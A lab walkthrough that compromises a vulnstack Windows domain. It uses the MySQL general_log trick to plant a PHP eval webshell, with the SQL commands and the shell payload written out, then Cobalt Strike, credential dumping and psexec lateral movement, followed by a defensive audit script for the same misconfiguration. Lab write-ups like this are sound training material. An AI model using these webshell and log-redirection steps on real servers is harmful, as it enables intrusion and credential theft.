Introduction#
The target environment comes from: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
A simple lab environment originally prepared for a student assessment but never used for it. Lateral movement within the domain uses only Cobalt Strike's psexec module; the main purpose is to walk through a typical penetration-testing workflow.
Several vulnerabilities in the lab could not be reproduced because of environment issues, but the overall workflow still works.
Environment Setup#
You need to disable accelerated 3D graphics; otherwise, the virtual machine cannot start.
The topology is as follows:
The network settings are as follows, using VMnet2 and VMnet8:
Web server (VM1) - Win7 (dual NIC: NAT mode + VMnet2 (host-only))
IP: 192.168.111.128 and 192.168.52.143
Start phpStudy
DNS points to the DC
Win2008 DC (VM3)
IP: 192.168.52.138
Win03 domain member (VM2)
IP: 192.168.52.141
View the current domain
Penetration Process#
Information Gathering#
Nmap Port Scanning#
Sword Scanning#
Directory Scanning#
phpinfo page
phpMyAdmin Login#
Login credentials: root/root
phpMyAdmin Getshell#
Get a shell through the MySQL general query log.
Check whether logging is enabled and where the log is stored: SHOW VARIABLES LIKE "general_log%";
Enable logging: set global general_log='on';
Check that it is enabled: SHOW VARIABLES LIKE "general_log%";
Point the log file at a file under the web root; first find the website directory.
Set the log path: set global general_log_file ='C:\\phpStudy\\WWW\\s.php';
Set successfully
With that in place, write the shell: a single SQL query is enough, because the query text is written verbatim into the log file.
select "<?php @eval($_POST[cmd]);?>";
Access web shell:
http://192.168.111.128/ss.php
Ant Sword connection:
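The getshell step above works only because the MySQL server can write its general log into the web root and a PHP handler will then execute it. The audit below is an added example (not part of the original walkthrough) that a defender can run against the output of SHOW VARIABLES to flag exactly that configuration, and that scans a general log for PHP tags. general_log, general_log_file and datadir are real MySQL system variables; the web-root path, datadir value and the sample log text are constructed for the demo.

```python
"""Defensive audit for the MySQL general_log webshell technique.

Added example; not part of the original walkthrough. The variable names
general_log / general_log_file / datadir are real MySQL system variables;
the web-root path, datadir and the sample log text below are constructed.
"""
import re
from pathlib import PureWindowsPath

# A PHP open tag inside a query is almost never legitimate.
PHP_TAG = re.compile(r"<\?(php\b|=)", re.IGNORECASE)
# Extensions a typical PHP stack executes (assumption: common phpStudy/Apache setup).
WEB_EXTENSIONS = {".php", ".phtml", ".php5", ".phar"}

# Constructed sample mirroring the lab's setting (name -> value, as SHOW VARIABLES returns).
SAMPLE_VARIABLES = {
    "general_log": "ON",
    "general_log_file": "C:\\phpStudy\\WWW\\s.php",
    "datadir": "C:\\phpStudy\\MySQL\\data\\",      # constructed value
}

# Constructed general-log excerpt in MySQL's tab-separated text format.
SAMPLE_LOG = (
    "Time                 Id Command    Argument\n"
    "2023-01-01T00:00:00.000000Z\t    5 Query\tSHOW VARIABLES LIKE \"general_log%\"\n"
    "2023-01-01T00:00:01.000000Z\t    5 Query\tselect \"<?php @eval($_POST[cmd]);?>\"\n"
    "2023-01-01T00:00:02.000000Z\t    5 Quit\n"
)


def _is_under(path: PureWindowsPath, root: PureWindowsPath) -> bool:
    """True if `path` lies inside `root` (case-insensitive Windows comparison)."""
    p = [s.lower() for s in path.parts]
    r = [s.lower() for s in root.parts]
    return p[: len(r)] == r


def audit_general_log(variables: dict, web_roots: list) -> list:
    """Return findings about a general_log configuration.

    `variables` is a name->value mapping built from SHOW VARIABLES;
    `web_roots` lists directories served by the web server.
    """
    findings = []
    if variables.get("general_log", "OFF").upper() == "ON":
        findings.append("general_log is ON: every query text is written to disk")
    log_file = variables.get("general_log_file", "")
    if not log_file:
        return findings
    path = PureWindowsPath(log_file)
    if path.suffix.lower() in WEB_EXTENSIONS:
        findings.append(f"general_log_file has a script extension: {log_file}")
    for root in web_roots:
        if _is_under(path, PureWindowsPath(root)):
            findings.append(f"general_log_file is inside web root {root}: {log_file}")
    datadir = variables.get("datadir")
    if datadir and not _is_under(path, PureWindowsPath(datadir)):
        findings.append(f"general_log_file is outside datadir {datadir}: {log_file}")
    return findings


def find_php_in_log(log_text: str) -> list:
    """Return general-log lines whose query text contains a PHP open tag."""
    return [line for line in log_text.splitlines() if PHP_TAG.search(line)]


if __name__ == "__main__":
    for f in audit_general_log(SAMPLE_VARIABLES, ["C:\\phpStudy\\WWW"]):
        print("FINDING:", f)
    for line in find_php_in_log(SAMPLE_LOG):
        print("SUSPICIOUS QUERY:", line)
```

The mitigations the findings point at are the usual ones: run mysqld under an account that cannot write to the web root, keep general_log_file inside datadir, and do not let the web application or phpMyAdmin connect as an account with the SUPER/SYSTEM_VARIABLES_ADMIN privilege that SET GLOBAL requires.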
The site on port 80 is yxcms.
Log in to the backend; SQL statements can be executed from there as well.
Check the IP address through the web shell
Found dual network cards
Cobalt Strike Startup#
Get a beacon in Cobalt Strike and operate from there.
Server
Client
Establish a listener
Generate payload
Upload the payload through Ant Sword and execute it
Run the exe; the beacon comes online in Cobalt Strike.
Sleep 0
Shell whoami
Privilege Escalation#
Use getsystem in Cobalt Strike to escalate privileges and obtain SYSTEM permissions.
Internal Network Information Collection#
Click Targets to see the three machines. If nothing appears, run a port scan and they will show up.
Dump hash
Obtain plaintext passwords
Lateral Movement#
After obtaining the password, use psexec for lateral movement. Here the three machines share the same password; if they were different, lateral movement over SMB with this password would not work.
Select psexec64 (64-bit)
Take control of the domain controller.
Use the same method to take control of 192.168.52.141, the Win2003 domain member.
Here you need to select psexec (32-bit)
Check the IP